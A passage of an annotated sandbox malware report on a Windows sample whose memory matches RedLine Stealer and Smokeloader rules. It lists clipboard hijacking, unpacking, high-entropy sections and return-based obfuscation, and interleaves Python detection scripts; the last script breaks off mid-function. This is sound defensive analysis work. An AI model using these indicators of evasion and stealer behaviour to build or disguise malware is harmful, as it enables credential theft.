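        urls[target].extend(raws)
    return {"urls": {k: sorted(v) for k, v in urls.items()}, "mutexes": sorted(mutexes)}


if __name__ == "__main__":
    result = extract_iocs(REPORT_LINES)
    for url, raws in sorted(result["urls"].items()):
        print(f"{url}  ({len(raws)} raw variant(s))")
    for mutex in result["mutexes"]:
        print("mutex:", mutex)
```

Single-observation leftovers such as `/ows` survive on purpose: the script only folds a string onto something else that was actually observed, so an analyst still sees every path and decides, rather than having a heuristic silently discard it.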
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04831947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_04831947
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                    System Summary

                    Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04832621 NtdllDefWindowProc_W,PostQuitMessage,0_2_04832621
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_0483237D
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00428042
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004071D0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004373F9
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004274A4
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042D50E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00428580
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004166CF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00413745
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00427816
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040E999
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00427AC0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00418ACF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042EB00
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00436CDF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00427D87
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00413F2B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048587E7
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485770B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485D775
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04844192
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485ED67
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048582A9
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483EC00
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857D27
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04848D36
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485ED67
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857FEE
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04866F46
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048439AC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04846936
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857A7D
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 048409A7 appears 52 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0484003E appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
                    Source: TP77MvSzt2.exeBinary or memory string: OriginalFileName vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000003.1780034064.00000000048A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: TP77MvSzt2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 9B3F.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAA6A6 CreateToolhelp32Snapshot,Module32First,0_2_02DAA6A6
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00413720
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5440
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Temp\9B3F.tmpJump to behavior
                    Source: TP77MvSzt2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: TP77MvSzt2.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\TP77MvSzt2.exe "C:\Users\user\Desktop\TP77MvSzt2.exe"
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeUnpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.sohumi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeUnpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeUnpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeUnpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: TP77MvSzt2.exeStatic PE information: section name: .sohumi
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00410786 push ecx; ret 0_2_00410799
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB9B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAD2BC push 00000003h; ret 0_2_02DAD2C0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAB4F3 push es; iretd 0_2_02DAB504
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAFA45 push ecx; ret 0_2_02DAFA62
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAF8C7 pushad ; ret 0_2_02DAF8E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAB9CE push E8665AC8h; iretd 0_2_02DAB9D3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DADF89 push FFFFFFADh; ret 0_2_02DADFFB
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04840018 push ecx; ret 0_2_0484002B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04869E08 pushad ; retf 0_2_04869E0F
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04867FBD push esp; retf 0_2_04867FBE
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048679BF push esp; retf 0_2_048679C7
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048409ED push ecx; ret 0_2_04840A00
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0041B035 push ecx; ret 1_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040020D pushfd ; iretd 1_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DE523 push eax; ret 1_2_008DE541
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DE532 push eax; ret 1_2_008DE541
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DB553 push 7DD07DC0h; iretd 1_2_008DB564
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DAA4D pushfd ; iretd 1_2_008DAA50
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B1B29C push ecx; ret 1_2_00B1B2AF
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B00F59 pushfd ; iretd 1_2_00B01078
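The `push X; ret`, `pushad; retf` and `pushfd; iretd` rows above are the disassembler reporting return-based control transfers that a compiler does not emit for ordinary code: `push imm32; ret` is a `jmp imm32` that a linear-sweep disassembler will not follow, and `iretd` in user-mode code is a decoy or the result of disassembling bytes that are not code at all. The scanner below is an added example, not the sandbox's own logic: it decodes the single-opcode x86 push forms (register, segment register, `pushad`, `pushfd`, `imm8`, `imm32`) and reports each one that is immediately followed by `ret`, `retf` or `iretd`, grading `push imm32; ret` and anything ending in `iretd` as strong and the rest as weak, because two-byte sequences like `push ecx; ret` also match by chance inside data and mis-aligned disassembly. The sample buffer is constructed from the encodings of instructions listed in the rows above, with an ordinary prologue and a `mov eax, 1; ret` mixed in as non-hits.

```python
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]   # opcodes 0x50..0x57
SEG_PUSH = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}       # single-byte segment pushes
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# Constructed sample: encodings of the instruction pairs the report lists,
# padded with ordinary code so the scanner has something to ignore.
SAMPLE = bytes.fromhex(
    "55 8B EC "             # push ebp; mov ebp, esp  (prologue, no hit)
    "68 C8 5A 66 E8 CF "    # push E8665AC8h; iretd
    "6A 03 C3 "             # push 00000003h; ret
    "51 C3 "                # push ecx; ret
    "60 CB "                # pushad; retf
    "9C CF "                # pushfd; iretd
    "06 CF "                # push es; iretd
    "B8 01 00 00 00 C3 "    # mov eax, 1; ret        (no hit)
    "6A AD C3"              # push FFFFFFADh; ret    (imm8 sign-extended)
)


def decode_push(buf, i):
    """Decode a single-operand push at buf[i]; return (text, length, kind) or None."""
    op = buf[i]
    if 0x50 <= op <= 0x57:
        return f"push {REG32[op - 0x50]}", 1, "reg"
    if op in SEG_PUSH:
        return f"push {SEG_PUSH[op]}", 1, "seg"
    if op == 0x60:
        return "pushad", 1, "all"
    if op == 0x9C:
        return "pushfd", 1, "flags"
    if op == 0x6A and i + 1 < len(buf):
        imm = struct.unpack_from("<b", buf, i + 1)[0] & 0xFFFFFFFF   # imm8 is sign-extended to 32 bits
        return f"push {imm:08X}h", 2, "imm8"
    if op == 0x68 and i + 4 < len(buf):
        imm = struct.unpack_from("<I", buf, i + 1)[0]
        return f"push {imm:08X}h", 5, "imm32"
    return None


def scan_push_ret(buf, base=0):
    """Return [(address, 'push ...; ret', 'strong'|'weak')] for every push immediately followed by a return."""
    hits = []
    for i in range(len(buf) - 1):
        decoded = decode_push(buf, i)
        if decoded is None:
            continue
        text, length, kind = decoded
        j = i + length
        if j < len(buf) and buf[j] in RETURNS:
            ret = RETURNS[buf[j]]
            # push imm32; ret is a disguised jmp; iretd never belongs in user-mode code.
            strong = kind == "imm32" or ret == "iretd"
            hits.append((base + i, f"{text}; {ret}", "strong" if strong else "weak"))
    return hits


if __name__ == "__main__":
    for addr, text, grade in scan_push_ret(SAMPLE, base=0x02DAB000):
        print(f"{addr:08X}  {grade:6}  {text}")
```

Run it over the raw bytes of an executable section rather than over a whole file: the strong hits cluster in the injected or unpacked regions (the `0x02DA....`, `0x0484....` and `0x008D....` addresses above), while the weak ones are spread through the CRT and data.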
                    Source: TP77MvSzt2.exeStatic PE information: section name: .text entropy: 7.6648823522119836
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
                    Source: 9B3F.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
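The two "Unpacked PE file" rows compare section rights after unpacking with the on-disk layout (note `.text:EW` for 9B3F.tmp.exe on disk and the extra `.sohumi` section in TP77MvSzt2.exe), and the entropy rows put the `.text` sections at 7.66 and 7.48 bits per byte, which is far above what compiled x86 code produces. The script below is an added example, not tooling from the report: it parses a PE section table by hand (no `pefile` dependency), computes per-section Shannon entropy, decodes the file characteristics the report lists for the sample (RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE), and flags the three things these rows point at: writable-and-executable sections, packed-looking executable code, and non-standard section names. It runs on two constructed, non-loadable PE images assembled inline; the 7.2-bit threshold and the standard-name list are assumptions.

```python
import math
import random
import struct

# Section flags from the PE/COFF specification.
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000
# COFF file-header flags; the report lists these three for TP77MvSzt2.exe.
FILE_FLAGS = [(0x0001, "RELOCS_STRIPPED"), (0x0002, "EXECUTABLE_IMAGE"), (0x0100, "32BIT_MACHINE")]

ENTROPY_PACKED = 7.2   # assumed cut-off in bits/byte; compiled x86 code normally sits well below it
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".bss", ".tls", ".pdata", ".CRT"}


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def perms(chars):
    """Render section rights the way the report does (E, R, W)."""
    return "".join(ch for ch, flag in (("E", SCN_MEM_EXECUTE), ("R", SCN_MEM_READ), ("W", SCN_MEM_WRITE)) if chars & flag)


def parse_pe(pe):
    """Walk DOS header -> PE signature -> COFF header -> section table; return (file_chars, sections)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    _machine, n_sections, _, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size                    # section headers follow the optional header
    sections = []
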